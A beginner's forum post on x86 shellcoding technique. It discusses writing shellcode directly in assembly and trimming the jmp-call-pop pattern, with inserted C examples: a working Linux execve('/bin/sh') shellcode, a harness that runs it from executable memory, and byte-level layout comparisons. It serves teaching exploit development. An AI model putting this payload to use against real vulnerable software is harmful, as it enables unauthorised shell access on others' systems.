I wrote this on my blog months ago, before college started, and after college started I never got time to post anything. While wandering on IRC my blog came to mind, and I thought, why not share it with you guys here.
In this post, I'll tell you what mistakes people make when writing shellcode and how to keep things simple by avoiding them.
Mistake 1
The most common mistake people make is to first write the shellcode in C and then tear it apart, removing the unnecessary assembly. In almost every shellcoding tutorial I have seen, the methodology is:
1.) Write it in C
2.) Disassemble it and remove the unnecessary assembly code.
3.) Write the necessary code (in assembly, obviously) in a separate assembly source file.
4.) Assemble it, run it and then extract the opcodes.
Removing bad characters is a separate, optional step: which bytes are bad depends on how the input reaches the vulnerable program. A null byte ends a string copied with strcpy() or passed as a C string, but a buffer filled by read() or memcpy() with an explicit length carries null bytes just fine, so in some cases not even nulls in the shellcode matter.
Good news, since it saves you the overhead of choosing register widths, memory sizes and operand forms that avoid null bytes, but the process as a whole is still too long.
This methodology is common even in the best books and resources on shellcoding, such as The Shellcoder's Handbook, and everywhere else.
The thing is, if in the end you are writing assembly code, why the hell aren't you doing that in the first place? And don't say you don't know assembly, because if that's the case, shellcoding isn't for you. Let's be honest, guys, even the previous method requires you to know assembly. Coming back to the topic: if you write it in assembly from the start, you save a lot of time. OKAY, I admit it takes only a minute to write the C version of a shellcode that pops a bash shell, but then disassembling it and analyzing every instruction to decide whether it is necessary or not is tiresome and a WASTE OF TIME. If you write it in assembly directly, you get two advantages.
Advantage No. 1 – It saves you the time of writing the C code, then studying and removing the extra asm it produces.
Advantage No. 2 – Since you know what you are doing, you can optimize your shellcode as far as you want, with no junk in it, because it contains only the instructions you put there.
Now if you don't know assembly, I would really recommend you go and learn it. I am not talking about advanced assembly, just knowing how functions work and how to do simple things: moving values around, arithmetic, syscalls and the like.
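To make the recommended flow concrete, here is an added example (not code from the original post): the classic Linux x86-32 execve("/bin/sh") shellcode written as assembly in the first place and kept as the bytes the assembler emits, next to the C harness used for step 4. The harness scans for bad characters, prints the \x escape string an exploit script pastes, and, only on a 32-bit Linux host, copies the bytes into an executable mapping and jumps to byte 0; on any other host it just prints. The function names (count_bad_chars, count_null_bytes, to_escapes) are my own, and the list of bad characters is whatever the caller decides the target input rejects.

```c
/* Added example: x86-32 Linux execve("/bin/sh") shellcode written as
 * assembly first, plus the test harness for step 4. Not from the post. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE
#endif
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#if defined(__linux__)
#include <sys/mman.h>
#endif

static const uint8_t shellcode[] = {
    0x31, 0xc0,                   /* xor  eax, eax   ; eax = 0 without a 0x00 byte  */
    0x99,                         /* cdq             ; edx = 0 (envp = NULL)        */
    0x50,                         /* push eax        ; string terminator            */
    0x68, 0x2f, 0x2f, 0x73, 0x68, /* push 0x68732f2f ; "//sh" (extra / avoids 0x00) */
    0x68, 0x2f, 0x62, 0x69, 0x6e, /* push 0x6e69622f ; "/bin"                       */
    0x89, 0xe3,                   /* mov  ebx, esp   ; ebx = "/bin//sh"             */
    0x50,                         /* push eax        ; argv[1] = NULL               */
    0x53,                         /* push ebx        ; argv[0] = "/bin//sh"         */
    0x89, 0xe1,                   /* mov  ecx, esp   ; ecx = argv                   */
    0xb0, 0x0b,                   /* mov  al, 11     ; __NR_execve                  */
    0xcd, 0x80                    /* int  0x80                                      */
};
#define SHELLCODE_LEN (sizeof shellcode)

/* Count the bytes of 'code' that appear in the caller's bad-character list. */
size_t count_bad_chars(const uint8_t *code, size_t len,
                       const uint8_t *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (code[i] == bad[j]) { hits++; break; }
    return hits;
}

/* The one bad byte nearly every string-based input rejects. */
size_t count_null_bytes(const uint8_t *code, size_t len)
{
    const uint8_t nul = 0x00;
    return count_bad_chars(code, len, &nul, 1);
}

/* Render the bytes as "\x31\xc0..." (what an exploit script pastes).
 * Returns characters written, or 0 if 'cap' cannot hold 4*len + NUL. */
size_t to_escapes(const uint8_t *code, size_t len, char *out, size_t cap)
{
    if (cap < len * 4 + 1) return 0;
    for (size_t i = 0; i < len; i++)
        snprintf(out + i * 4, 5, "\\x%02x", code[i]);
    return len * 4;
}

int main(void)
{
    char buf[4 * SHELLCODE_LEN + 1];
    to_escapes(shellcode, SHELLCODE_LEN, buf, sizeof buf);
    printf("%zu bytes, %zu null bytes\n%s\n", SHELLCODE_LEN,
           count_null_bytes(shellcode, SHELLCODE_LEN), buf);
#if defined(__linux__) && defined(__i386__)
    /* Step 4, "run it": copy into an executable mapping and jump to byte 0.
     * Only meaningful on a 32-bit Linux host (int 0x80 ABI, 32-bit pushes). */
    void *mem = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) { perror("mmap"); return 1; }
    memcpy(mem, shellcode, SHELLCODE_LEN);
    ((void (*)(void))mem)();
#else
    puts("not a 32-bit Linux host; not executing the bytes");
#endif
    return 0;
}
```

The bad-character scan is the check to run before any byte-avoidance work: if the target input is a length-delimited read(), the 0x00 that a `mov eax, 11` would produce is harmless and the `mov al, 11` trick buys nothing.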
Mistake 2
The point here is a simple piece of logic that isn't being used (at least I haven't seen it anywhere myself). I am discussing the famous
jmp-call-pop technique for finding the address of a string at runtime rather than binding it statically into the shellcode. Why do we use it? If you define the string (usually the name of the program or command to execute) in a normal program, it gets embedded in the binary and referenced by an absolute address. Shellcode cannot do that: it gets copied into the address space of the vulnerable binary at a location you don't know in advance, so any absolute address baked in would point at something invalid. The trick is that call pushes the address of the instruction following it onto the stack; if the string is placed right after the call, the called code can pop that return address and have a pointer to the string, wherever the shellcode ended up.
When using the jmp-call-pop technique, we do something like this (GAS syntax, as in the original skeleton):
_start:
    jmp shellcode              # hop forward to the call
exploit:
    pop %esi                   # esi = address of the string, pushed by call
    # Code here that is to be executed (esi points at "Yo")
shellcode:
    call exploit               # pushes the address of the .ascii below, jumps back
    .ascii "Yo"
Now, this is just a skeleton, but this is how it is written. If you look closely, there is an
unnecessary jmp, yes, an UNNECESSARY JUMP.
To cut the unnecessary part, we write it this way instead:
exploit:
    pop %esi                   # esi = address of the string
    # Code here to be executed
_start:
    call exploit
    .ascii "Yo"
In the second example (the code above), we have cut the unnecessary part and SAVED 2 BYTES, and it is good to save every single byte in shellcode; if you do shellcoding, you'll know. One caveat a practitioner should check before adopting this: the saving only holds when execution enters at _start, which is what happens when you assemble and link this as a standalone binary. When the extracted bytes are injected into a vulnerable program, execution begins at the first byte of the blob, which in this layout is the code under exploit, so that code runs once with whatever happens to be on the stack before the call ever pushes the string's address. The Handbook's jmp exists to get from byte 0 to the call without executing the body first, while still keeping the call backward; a backward call has a negative displacement (high bytes 0xFF), whereas a forward call placed first to skip over the string would have a small positive displacement whose upper bytes are null.
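The three layouts compared at the byte level, as an added example that is not part of the original post. It encodes the Handbook's jmp-call-pop stub, the post's call-first stub and a forward-call stub around the same constructed payload (pop esi; xor eax, eax; mov [esi+7], al; two nops, which terminates "/bin/sh" at runtime) and checks each blob's first byte and null-byte content. The builder names and SAMPLE_PAYLOAD are mine; the displacement arithmetic is the x86 rule that rel8/rel32 are measured from the end of the jump or call instruction.

```c
/* Added example: the jmp-call-pop layouts compared at the byte level.
 * SAMPLE_PAYLOAD and the string are constructed; not code from the post. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define OP_JMP_SHORT  0xEB   /* jmp  rel8  : EB xx          */
#define OP_CALL_REL32 0xE8   /* call rel32 : E8 xx xx xx xx */

/* Constructed stand-in for the code under exploit (8 bytes):
 *   pop esi ; xor eax, eax ; mov [esi+7], al ; nop ; nop */
static const uint8_t SAMPLE_PAYLOAD[] = {
    0x5e, 0x31, 0xc0, 0x88, 0x46, 0x07, 0x90, 0x90
};
#define SAMPLE_PAYLOAD_LEN (sizeof SAMPLE_PAYLOAD)

static void put_le32(uint8_t *p, int32_t v)
{
    uint32_t u = (uint32_t)v;
    p[0] = u & 0xff; p[1] = (u >> 8) & 0xff;
    p[2] = (u >> 16) & 0xff; p[3] = (u >> 24) & 0xff;
}

/* Displacement of a call that sits right after 'plen' payload bytes and
 * targets the start of that payload: measured from the end of the call. */
int32_t call_back_rel32(size_t plen)
{
    return -(int32_t)(plen + 5);
}

int has_null(const uint8_t *p, size_t n)
{
    return memchr(p, 0, n) != NULL;
}

/* Layout 1 (Handbook): jmp short ; payload ; call payload ; string */
size_t build_jmp_call_pop(const uint8_t *payload, size_t plen,
                          const char *str, size_t slen,
                          uint8_t *out, size_t cap)
{
    size_t total = 2 + plen + 5 + slen;
    if (plen > 127 || cap < total) return 0;   /* rel8 limit of the short jmp */
    out[0] = OP_JMP_SHORT; out[1] = (uint8_t)plen;     /* skip over the payload */
    memcpy(out + 2, payload, plen);
    out[2 + plen] = OP_CALL_REL32;
    put_le32(out + 3 + plen, call_back_rel32(plen));   /* negative: xx FF FF FF */
    memcpy(out + 7 + plen, str, slen);
    return total;
}

/* Layout 2 (the post): payload ; call payload ; string.
 * Byte 0 is payload[0]; that is what runs first when the blob is injected. */
size_t build_call_first(const uint8_t *payload, size_t plen,
                        const char *str, size_t slen,
                        uint8_t *out, size_t cap)
{
    size_t total = plen + 5 + slen;
    if (cap < total) return 0;
    memcpy(out, payload, plen);
    out[plen] = OP_CALL_REL32;
    put_le32(out + plen + 1, call_back_rel32(plen));
    memcpy(out + plen + 5, str, slen);
    return total;
}

/* Layout 3 (call first, no jmp): call over the string ; string ; payload.
 * The displacement is the string length, so its upper bytes are 0x00. */
size_t build_forward_call(const uint8_t *payload, size_t plen,
                          const char *str, size_t slen,
                          uint8_t *out, size_t cap)
{
    size_t total = 5 + slen + plen;
    if (cap < total) return 0;
    out[0] = OP_CALL_REL32;
    put_le32(out + 1, (int32_t)slen);
    memcpy(out + 5, str, slen);
    memcpy(out + 5 + slen, payload, plen);
    return total;
}

static void show(const char *name, const uint8_t *b, size_t n)
{
    printf("%-14s %2zu bytes, first byte %02x, null bytes: %s\n",
           name, n, b[0], has_null(b, n) ? "yes" : "no");
}

int main(void)
{
    uint8_t b[64];
    size_t n;
    n = build_jmp_call_pop(SAMPLE_PAYLOAD, SAMPLE_PAYLOAD_LEN, "/bin/sh", 7, b, sizeof b);
    show("jmp-call-pop", b, n);
    n = build_call_first(SAMPLE_PAYLOAD, SAMPLE_PAYLOAD_LEN, "/bin/sh", 7, b, sizeof b);
    show("call-first", b, n);
    n = build_forward_call(SAMPLE_PAYLOAD, SAMPLE_PAYLOAD_LEN, "/bin/sh", 7, b, sizeof b);
    show("forward-call", b, n);
    return 0;
}
```

With an 8-byte payload the backward call encodes as E8 F3 FF FF FF (-13) in both the Handbook's and the post's layout, so neither has null bytes; the difference is that layout 2 starts with 0x5E, a pop esi executed before anything has been pushed. Layout 3 shows why the jmp cannot simply be replaced by a forward call: E8 07 00 00 00.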
To be honest, I wouldn't really call them mistakes, but I don't have a better word for what they should be called. :p
A possible explanation for why they did it that way in The Shellcoder's Handbook: maybe what I did didn't run well on the vast majority of systems, while what they did ran well. I have only done x86 shellcoding so far.
If I said something wrong, do let me know; I am also a beginner, learning things. I will be thankful for your advice.